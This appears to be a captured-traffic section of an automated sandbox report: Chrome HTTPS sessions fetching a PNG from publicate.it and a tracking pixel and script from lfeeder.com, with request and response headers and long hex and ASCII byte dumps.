                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ca 47 e5 90 c0 32 14 1f 15 25 46 a5 43 a2 e8 f3 f0 0c 0a c8 51 d6 ef 45 44 24 5b 88 b7 b5 aa d8 4f 64 7a 04 42 e1 64 22 ad c5 7c 4e b5 df ce e4 53 bd b0 90 63 39 4e d2 29 ec da 79 08 9b cd 67 7c b9 a1 f2 9b 35 7e 93 d9 47 82 db 27 43 99 2f f9 87 5f 99 e4 2e 83 8d 60 54 73 76 8f 81 3f a0 9a 61 a2 82 51 cf 7c e6 f7 80 75 e4 83 f3 4c 48 e7 8c 14 22 49 d8 6c 14 c5 51 b5 75 26 1c 5f 09 af d7 b0 8a 14 65 e3 44 41 45 08 c9 2c cb 46 59 2a 20 f0 0c cf 50 21 3e cc 87 48 9d 96 f8 28 2b 72 08 f9 23 05 a5 94 ad 44 f5 e6 5a 35 44 a0 72 21 db 6c 6b 79 71 45 cb e4 a4 20 1b 4a a5 e3 dd 4c 3a 25 d9 9c e1 58 a2 2a 13 5e bd df 8a 84 c5 1e 1b d2 f5 9a d7 03 3b 1b a2 9c c6 9e 8b af c7 f0 64 30 fb c5 b0 31 88 d3 c7 98 ad bf f9 e5 a1 13 77 e9 70 b1 80 b7 f2 f0 c3 0f 3f 3c 39 64
                                                                                                                                                                                                        Data Ascii: G2%FCQED$[OdzBd"|NSc9N)yg|5~G'C/_.`Tsv?aQ|uLH"IlQu&_eDAE,FY* P!>H(+r#DZ5Dr!lkyqE JL:%X*^;d01wp?<9d
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 91 68 b0 6c 23 d3 68 a7 56 56 72 3a c1 c9 32 07 4e f1 02 e9 c4 61 1e 98 f0 5b 04 2a e9 24 49 b8 c2 d2 b2 7a f1 7c f1 d5 8f 80 90 0a fe ca 92 89 f4 a8 40 61 14 f7 46 65 e9 af d6 9f 7e 0b e3 63 00 bf 09 fe 9e a5 51 b5 f0 b3 f3 e0 e3 72 98 54 01 6b d1 03 4a 0e 11 b7 81 3f b8 b5 f0 80 20 a7 09 14 0e 2c cb 01 49 e4 05 96 0d 79 11 21 b6 ea 85 44 22 9f eb 65 d6 ea ed 78 b1 a9 65 0b 8a 96 ed b3 99 6c d9 ef 07 a0 b5 84 56 ea 2d 50 5e e4 ed 16 b2 9d 60 08 8a 4b 2b 29 2d 4f 0b 95 74 6c 35 b5 96 d6 b4 2a 6d f3 52 91 76 ab 23 fb f9 1e cd 71 52 00 94 1f 7b 1e 4e e7 58 b4 87 bc 5e 5c ed 30 ff e2 fc a8 91 fc 1b e9 b5 d7 48 a4 50 14 d2 19 5a 42 88 88 a6 aa f9 4c 53 4a 6a 8a a2 35 84 e5 f6 77 53 52 52 c9 97 5b e9 0a 5d 4b 26 5a ad 44 c7 53 eb 64 d7 4a 39 28 2b 78 e5 a0 ca
                                                                                                                                                                                                        Data Ascii: hl#hVVr:2Na[*$Iz|@aFe~cQrTkJ? ,Iy!D"exelV-P^`K+)-Otl5*mRv#qR{NX^\0HPZBLSJj5wSRR[]K&ZDSdJ9(+x
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ab cd 4c 47 ed c7 8b 94 1a a4 c3 88 ab 79 60 83 20 bc 4e c8 a4 98 46 63 d8 96 81 df d9 03 1e ba 17 71 3a e7 45 9c cc d0 6c 94 e6 90 4d 8a 67 13 8a 96 17 84 8c d2 f7 51 44 a8 99 ad d4 5b 92 90 d7 62 1c e9 27 d9 4c 5a d3 1a 34 e9 a2 a6 f9 bc 56 69 ae c8 c1 4c b6 59 51 e2 7a 31 5b 62 d9 cc 5a 22 91 68 f1 2b 85 36 bf 20 c6 e2 ac 5f 06 76 38 b6 d2 88 43 90 c3 70 9a 8b f9 a6 f8 cf 67 14 0c a0 1f 98 f9 04 bc 70 a8 16 e2 8a 81 03 f4 64 9c 20 3a b0 e1 7f 2d 3d f4 ff c6 74 a9 a1 f6 af 77 fa 8d ca 24 ac 5f 0b 2e 62 fc f6 17 66 a3 0e ad ea 35 9f cf ac 62 e0 e8 ea 26 ba 01 64 d8 48 12 7c f0 1a 24 85 09 5d a0 25 c4 71 90 78 99 f6 20 9c ef 1e e3 e1 0c b7 6a 84 20 82 80 b4 a4 ae 8a 12 f2 a9 34 2b fa 6c a1 20 2f 4b 8c 10 f6 12 62 35 9d af 26 b2 b9 60 29 db f5 53 44 30 53
                                                                                                                                                                                                        Data Ascii: LGy` NFcq:ElMgQD[b'LZ4ViLYQz1[bZ"h+6 _v8Cpgpd :-=tw$_.bf5b&dH|$]%qx j 4+l /Kb5&`)SD0S
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: fe bf 05 e8 77 18 74 65 31 98 e1 b8 df 03 f3 14 0c 4f ed fc c5 65 3c 12 07 53 48 07 d4 d7 c1 fe 68 ec dd 58 80 8a 4d 38 29 3d 40 85 e9 a8 c0 21 42 8d e5 33 85 4c b4 58 4f 27 b4 c4 0a 8a 24 4a 51 a1 52 88 44 0a 4a df 93 ab e7 93 85 06 b3 c0 b7 d7 80 59 08 69 6e 9e d5 43 34 cf d7 42 6a 18 ea 1b 3a 2d b0 ac 20 07 44 55 90 09 e4 ec b6 52 c9 88 40 51 b2 cc 91 46 61 15 61 cc cc be ab 11 49 01 0f 77 20 3c c0 3e ac 85 a5 90 ce d1 dd a2 4e c7 aa d5 4a 26 19 40 36 26 95 6f e5 fc 72 ae a8 22 3d 14 e0 80 fe 6a 5b c7 31 34 7d bd 41 cd 16 0f 6f c2 7d dc cb 98 da 97 1c 52 fb 96 76 e3 19 0e b7 05 ff af 68 e9 f9 5a 41 bf 75 d2 d5 d0 19 35 87 e2 e0 90 cc 34 e1 b9 e8 27 ab cb 7a cd 8f 79 0a 50 69 c0 0d 00 03 ef 6c e8 11 e1 bf c6 45 f3 49 6c b1 28 e8 42 3c 25 e4 2a 99 08 42
                                                                                                                                                                                                        Data Ascii: wte1Oe<SHhXM8)=@!B3LXO'$JQRDJYinC4Bj:- DUR@QFaaIw <>NJ&@6&or"=j[14}Ao}RvhZAu54'zyPilEIl(B<%*B


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        105192.168.2.549893104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1036OUTGET /images/template5-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 129281
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1f901-620aa1d1b35a6"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YZDAZ8YJtarrcD5BuModNlHXvx1dxfX6G0PYMOPfwFdSRiKc4USGHvBTyPq8t3MjmAXrnttKHodMzahwByEdx40fRfTQus46bMlR4%2Fpyw478LCuie%2FOav84imTiODw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615cc2c7b17f9-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC622INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 0a 0a 0a fd fe ff fc fc fc d2 c2 ba 62 61 61 dd 83 46 e5 cf ac 02 02 02 00 00 00 01 01 01 30 30 30 fe fe fe f5 f4 f4 f4 f3 f1 d9 62 21 d8 62 1f d9 61 20 d8 61 20 d8 62 20 d8 61 1e d7 61 1d fb fd fb da 60 1d fe ff fe d6 61 21 e6 e7 e5 e7 e9 e8 ea e9 e6 d8 5e 1b 17 16 14 d4 5e 1c fa f5 ef dc 5f 21 33 2d 29 eb ec ea f0 ee ea 3d 32 2b f9 f9 f5 3a 2b 25 d7 5c 17 d1 62 24 39 3c 32 40 42 37 dc dd d8 d4 63 1c f7 f1 ed 21 1a 15 4a 46 38 55 46 34 30 26 20 31 35 2e ea be a4 d0 6e 35 d7 96 6b 69 63 51 d2 67 2c d1 7e 49 d0 76 3e 5b 4e 3b d9 9e 75 28 20 1b e1 e1 dd 48 3c 2f 9e 52 1c f1 f4 f0 4c 4c 3e c3 c4 be dc 71 34 2f 1f 0f f3 df cc 47 30 27 56
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbaaF000b!ba a b aa`a!^^_!3-)=2+:+%\b$9<2@B7c!JF8UF40& 15.n5kicQg,~Iv>[N;u( H</RLL>q4/G0'V
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 61 e6 de ce 6e 2c 0f df d3 c2 df ad 66 d7 83 2f bb b9 af cf 86 19 ec cc 96 99 92 82 7d 4e 30 e8 b9 6d cf 9f 75 89 84 77 bb 88 46 e9 93 45 8a 73 3c 9a 77 37 ed b6 97 7f 63 2e ee 91 13 f4 a4 59 3d 13 09 d6 a1 5b 51 19 0e a1 88 4a af 9c 80 c3 66 12 ac 46 1d 63 4a 22 75 53 22 ae a7 99 d7 cb b8 a0 9e 92 ca 91 75 ba 55 12 cf b8 7e b3 97 59 cb c3 b2 66 18 0e 8e 63 1b c6 a6 64 af b1 a8 f9 c2 8f 83 20 11 76 75 6b f9 b2 75 d5 c5 92 bc a6 74 be b1 9e 9f 28 12 c1 ad 8d b5 8c 2f d3 50 0f cb ba a5 b9 87 73 a6 77 1c 73 98 5d c0 9d 86 5e 7f 52 bb 2b 19 ea 33 12 85 ad 7b d8 61 e1 51 00 00 00 0e 74 52 4e 53 01 c0 bf 1d 0c fe fd 04 07 0b 11 d4 76 e4 4b c3 fd 64 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd bd 8b 23 49 d6
                                                                                                                                                                                                        Data Ascii: an,f/}N0muwFEs<w7c.Y=[QJfFcJ"uS"uU~Yfcd vukut(/Psws]^R+3{aQtRNSvKdpHYs IDATx#I
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 90 12 94 9f 6c 8b 80 8b a0 97 2c 16 29 98 eb 75 ac 3c a7 e6 39 ba 36 fe 07 0f f1 8e de fe 33 a4 ae 40 62 21 89 19 67 1e 2d 0f fb 3b 24 3a be 37 f3 1c 7c 44 3a 8b d6 02 71 ba 7d 0d c1 85 68 a4 01 5d 57 d8 63 c1 88 b5 49 aa d1 c5 e8 2e a7 34 b7 d7 6c 68 6a 65 0b 3f ff 75 fd 3d 2d 43 5c 3c cd a1 bd eb 43 aa db df 0f 44 a7 77 8d cc fe 51 54 7f f1 d5 b7 ed db 9f 3b 3e 5e c2 12 4d 00 70 85 24 1f 25 a9 0e 7c c1 98 d0 f9 fc e6 fe ed 5d 0c 3e 77 1c e1 30 26 a4 1f 8c e3 7c 34 1f ce 36 dd 4c fb 2c 54 4a 22 33 d1 43 d6 0c 40 6c 54 6f 7f b5 58 f5 04 f7 00 54 a8 cb 2a 7b b3 d9 bc 8b 03 e1 32 06 bd c5 52 0a d7 95 a8 a6 e8 38 4d a6 9b e1 ed cd fd 7c 3a fa fb db 59 bb d5 de 26 5a 29 01 2c f4 8b 4d 11 30 15 2c 92 6c b9 f4 97 f3 a9 41 9e 40 be 46 66 40 0e c7 bd 9c 48 6a 99
                                                                                                                                                                                                        Data Ascii: l,)u<963@b!g-;$:7|D:q}h]WcI.4lhje?u=-C\<CDwQT;>^Mp$%|]>w0&|46L,TJ"3C@lToXT*{2R8M|:Y&Z),M0,lA@Ff@Hj
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 87 c3 aa ad 57 a5 60 ae 94 6e 05 c9 f6 b2 30 55 29 7d bd cb 2e 7a 5c 38 9e 2b 23 10 02 40 0a 85 bf e3 a1 8a 94 2e b6 57 e8 92 89 a2 38 35 7e a8 dc de b2 54 55 5c f4 b8 90 9c 45 59 6e c8 62 03 70 8f d8 d5 ca e0 3d d3 71 56 5b 10 c8 b9 74 fc 88 e8 7b 21 61 6d 4d fb b4 96 f3 4f 38 9d 58 dc b2 ff fe ea 35 a7 1f ef e9 b4 db 7f 98 d3 1f 13 bd 7e 84 13 e3 ee 7d 9c 8e 02 e7 e8 01 1d ee 74 5e b7 7f ff e2 43 12 9e 36 f4 55 b1 45 cf 47 5c 95 c8 4c a1 49 d3 18 2a e4 63 2e 84 e2 e6 a7 2c c0 c7 61 1c ed aa 60 31 b9 8b 84 07 6e e4 31 55 55 b8 f5 e7 cb 90 36 78 56 85 bb fc fa 66 53 68 40 c9 40 1b ed f1 7b d2 6c 00 1a 06 32 f8 69 3b 4f 21 54 91 1c 64 78 01 f2 6b 00 48 a9 70 e3 46 4e 67 1c 65 40 ba 69 b7 66 6f 62 25 c6 59 11 fb dc 81 5e af 0a 55 9c 2f b9 00 2e 64 96 ea 6c
                                                                                                                                                                                                        Data Ascii: W`n0U)}.z\8+#@.W85~TU\EYnbp=qV[t{!amMO8X5~}t^C6UEG\LI*c.,a`1n1UU6xVfSh@@{l2i;O!TdxkHpFNge@ifob%Y^U/.dl
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: e3 b9 8c 28 7a 80 7e 35 57 29 f3 d7 ee 4e 67 c5 ea fa 7a 92 a4 71 f6 66 ba a0 60 97 06 d2 f6 74 9a e4 46 84 2a 0c dd b2 82 bb ed ab eb 54 a3 8b 0d 8d bc e3 27 b2 7a 8f 2b aa 30 d9 4e 4c 19 69 28 55 29 7c 89 d9 19 45 81 04 17 10 04 26 cd f3 c5 40 29 88 fc 6c de 6e af 33 70 80 14 6f c1 c1 cf 0a 63 f2 18 c2 50 44 65 35 e8 0d 7c 2e fc 7c b3 32 18 ca 7f 8a 62 e4 1a a2 ad 11 27 f0 3c 83 d6 53 dd a8 70 4d 78 eb 3c 29 ea 20 fc 03 43 f4 11 41 6b 0b b1 b6 1d 1f c4 4e 1f 12 ba e1 0f 7b 27 32 14 6b 63 43 a0 b9 79 bc 1c cf 7b 6f 6b ef 27 ce b0 e7 39 fe 02 3d 34 e7 a9 8e 1f 7f fd 87 1f 50 cd 50 0c a2 48 80 c9 e7 57 18 cc 8a 4a 1b 66 e4 9c ab 4a e8 ee db bb c9 66 33 4d 16 3b cd ab 4e dc 9d e4 40 de 31 0e 00 ca f7 e3 74 29 70 f7 93 51 3c 1a de ae 17 a0 01 37 2d 54 91 8f
                                                                                                                                                                                                        Data Ascii: (z~5W)Ngzqf`tF*T'z+0NLi(U)|E&@)ln3pocPDe5|.|2b'<SpMx<) CAkN{'2kcCy{ok'9=4PPHWJfJf3M;N@1t)pQ<7-T
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 93 73 9e e8 0e 7a db 8f 7d 6b b5 03 f4 98 aa 27 56 be 77 e6 f8 e0 6d 7d e4 a7 db 3b 79 4f 6e 69 85 7a 93 59 45 fb a0 10 96 c8 44 bc da c7 4d 33 45 e2 1c a5 4f b3 06 f0 7b 2b 12 48 24 51 6e a9 73 8e e8 d6 8f 48 44 b7 1e 7d 1b 9a 1d fc e3 6f 2f bf fe ea 3f 1e 13 fd 05 12 fd db 97 48 74 c6 c1 2c 7a 80 fa 97 70 41 2a 5d 6c ae 6e ee 87 db 55 aa 03 0c 66 29 0c 86 f9 28 b9 05 63 0a b7 71 1c 36 f2 ab fc c0 7c 3f 9d 5d f5 df 64 80 c1 b1 a7 38 ce 73 b8 2b 43 3d da 16 00 4e 18 04 8a 31 c1 85 eb 61 ce 2b c0 32 cd f3 14 c5 bd 50 12 78 74 d7 6f 6d 8b f8 fa 76 a5 05 57 71 de 13 51 2f 49 7d c1 7c 53 e4 41 9c 2c 7c 98 6c d7 9b 3c 88 8a 4d 02 e0 28 81 2a e6 59 3f ac 25 01 3b f5 ad d5 d3 77 f8 fe c1 b1 cd be 61 8f be af 99 eb 81 9f ee a1 53 97 de b6 76 0c d7 81 f9 5a 53 43
                                                                                                                                                                                                        Data Ascii: sz}k'Vwm};yOnizYEDM3EO{+H$QnsHD}o/?Ht,zpA*]lnUf)(cq6|?]d8s+C=N1a+2PxtomvWqQ/I}|SA,|l<M(*Y?%;waSvZSC
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: d8 dc 6f 2f 53 1f d7 1a 39 5d c8 1a e6 5f 28 cb 98 93 56 75 de c3 5d fb 77 4e bc f7 ef 49 75 7f bf 1f bf f6 a9 d5 79 d3 b5 c7 ee 78 4d d4 ff 6d 14 b9 fd e9 35 d1 8f 73 d1 9a 1f e0 c7 e7 89 fe e2 40 f4 20 2d e2 00 2b 44 23 cf 95 7e 27 30 e9 04 0b 88 42 06 26 19 de 4e 8b a4 db ed 26 39 b1 34 03 c7 01 51 8e 7f 9c b7 af 26 3b 8c 7a a3 fd c9 3d cf c5 fd 98 09 f7 e9 6d b5 2e 08 12 2c 0c 23 fd d3 26 09 38 94 4a a1 f0 f0 96 58 a1 5a 75 c6 f9 f4 a6 fd aa dd 9e a7 a0 30 90 63 ae d1 06 87 34 31 65 b4 58 80 22 8f b4 e3 b8 60 a6 9b 34 58 fc 70 73 9d ef 18 6a 9a 75 de db 63 a2 7f 06 a7 7b e7 d3 27 f6 69 b3 a7 71 ba 27 88 4e c6 5c a3 62 1e 59 7d a7 31 b3 3a 43 b2 e1 f4 9a 80 f8 83 ba 44 b6 2e a8 6b 14 b9 7d f6 fd 7e e3 a8 93 cc 31 48 51 2b 0d 07 a2 1f 53 1d 69 5e 13 dd
                                                                                                                                                                                                        Data Ascii: o/S9]_(Vu]wNIuyxMm5s@ -+D#~'0B&N&94Q&;z=m.,#&8JXZu0c41eX"`4Xpsjuc{'iq'N\bY}1:CD.k}~1HQ+Si^
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 5b ac dd d3 6d 7a f5 07 38 7d 53 68 15 a2 91 8d a5 69 48 87 e4 32 0f 83 6c f5 7f 06 2a 8a b8 0a 8a bf 2e c7 05 52 bd aa c0 a6 86 ab 4a 05 26 5f cf 5a 57 f3 3b e3 93 70 a2 d4 ac 73 e2 fd 90 28 42 a9 06 8e c3 21 be de a4 94 2c 03 81 1c f4 16 84 4f 05 ac d2 f9 e6 66 64 7c 10 2a 64 4a 46 aa 0a 97 dd 0b 9f 41 ba 70 c9 90 88 22 b3 74 bc 52 75 b7 5d 60 91 a4 b5 4e 24 27 ff e6 13 e2 fd 9f 31 bc 5a 47 67 8f 89 8e d4 b1 2a 35 45 d5 ac 1c ac c5 78 ad bf e1 0c 1d c4 3b 5d a9 d6 ee 6a 40 14 9c df 03 d1 69 73 af d5 b9 c3 de d0 14 56 13 25 48 bc fb 1f d8 d3 b3 40 61 a9 39 c6 cf 80 a9 20 9e 4e 4c 28 4c d2 35 be c4 4c 97 7c d4 f3 f5 f7 9b d9 24 f6 2b 5a 5b 3a 92 42 40 60 8a f9 ab fb 7d 18 85 00 00 20 00 49 44 41 54 16 d6 a3 db 28 8d 8d f1 1f 89 c4 5a bc 1f b6 1c 4c 2a 62
                                                                                                                                                                                                        Data Ascii: [mz8}ShiH2l*.RJ&_ZW;ps(B!,Ofd|*dJFAp"tRu]`N$'1ZGg*5Ex;]j@isV%H@a9 NL(L5L|$+Z[:B@`} IDAT(ZL*b
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: b9 51 ca 4f 0b 13 c9 b8 c8 02 97 61 15 c5 a0 37 88 20 f4 e3 74 c0 5d 3f 5b 5f a7 21 a6 7a 1c bb 80 4e ea b9 9b 9d ef dc 93 9c 1d 4d d5 ff 51 3c fa f8 a7 27 61 cb a7 0e f1 c5 d1 94 46 26 b4 71 47 ba 44 9d c9 44 84 22 fc cd c6 0d 8d 22 cf 75 dd 26 5c 40 f6 b5 dd b2 f0 73 e4 63 8b 38 6b 91 6d 85 4b ae 8e 06 76 96 12 cc ea f2 17 8b 88 87 fb e6 29 48 8a f3 0c 4e 0f 40 28 11 c0 c5 6a 8a 50 bf eb ae 56 52 85 22 0a c3 25 10 28 24 88 0a e1 86 22 69 26 57 c3 e9 08 cb d2 2f 96 68 39 a8 12 d3 e9 76 a3 59 fb 3a 93 92 31 79 a6 c4 61 9f 84 c2 1d 4f 32 40 ac 10 c9 01 b1 2e 74 80 70 25 20 a3 7c 7e 99 06 90 fd df 99 14 a1 b9 cb 41 46 d9 6b 23 5d 21 24 e7 83 9e 83 25 cd cb 5e 08 b0 c4 1c 77 0c c6 d6 fb 79 7d fd fa 3d 2d 7b 1c c5 a3 1f 82 37 b0 bd b2 d6 6c 9b cd 4f 8f fe 3d
                                                                                                                                                                                                        Data Ascii: QOa7 t]?[_!zNMQ<'aF&qGDD""u&\@sc8kmKv)HN@(jPVR"%($"i&W/h9vY:1yaO2@.tp% |~AFk#]!$%^wy}=-{7lO=
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 3f 9e 5c 2f 02 33 ea 0f 87 c3 6b ac 2a 60 5c 2a 33 ea cf 86 fd 69 e6 96 d9 f5 ac df ff 9f 89 ae 30 27 0c ed 28 37 48 fa c3 fe 76 9a 63 81 e7 6a 38 ec f7 27 71 d0 fb 75 38 1c f6 31 0e 9a 4d fb c3 6d 37 c6 8d 55 9c f8 78 3f 4c 74 aa 8a 10 82 05 e9 6a 11 84 26 29 c6 54 e3 80 3a 46 a5 27 c3 04 f3 14 41 99 ee 5f 8d cf 84 e9 6e ba 46 0a 8c b3 a2 65 61 fd 6c e3 d1 ab 1b 44 e5 7d 08 a6 d3 64 7b d8 62 5b b5 bc bc 5e fa 21 48 df 24 85 c1 30 5b 3c 99 c4 20 23 b6 40 7c 09 a1 d3 0b 4c cb c2 7d 9c 0a 5e 84 2b 5c 44 08 8f a2 dd 68 4b 18 77 74 cb 47 e2 1d 97 df 01 50 e8 29 a2 f3 f7 13 bd f6 9d 9d 4d a5 fe 00 d1 d3 bb e9 ec ed 5d 0a 2a bd ec 4f ee de cd 87 a3 01 e6 76 39 00 51 b1 dd be b9 7b b3 dd 26 ba d2 58 af ab e2 eb cd c2 37 93 fe aa 58 f5 27 86 c0 51 4b b3 1a be bd
                                                                                                                                                                                                        Data Ascii: ?\/3k*`\*3i0'(7Hvcj8'qu81Mm7Ux?Ltj&)T:F'A_nFealD}d{b[^!H$0[< #@|L}^+\DhKwtGP)M]*Ov9Q{&X7X'QK


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        106192.168.2.54988418.239.83.654436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1252OUTGET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1
                                                                                                                                                                                                        Host: tr-rc.lfeeder.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC414INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        X-Cache: LambdaGeneratedResponse from cloudfront
                                                                                                                                                                                                        Via: 1.1 4a345f25fcb995602afaf132ccf353de.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: wTc1Rjn67kOd523ZYbQgWPKhtNNdgWMB0Qm7JUFRl2GQfwdR4zhIvA==
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        107192.168.2.54987918.66.122.54436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC370OUTGET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1
                                                                                                                                                                                                        Host: sc.lfeeder.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC668INHTTP/1.1 200 OK
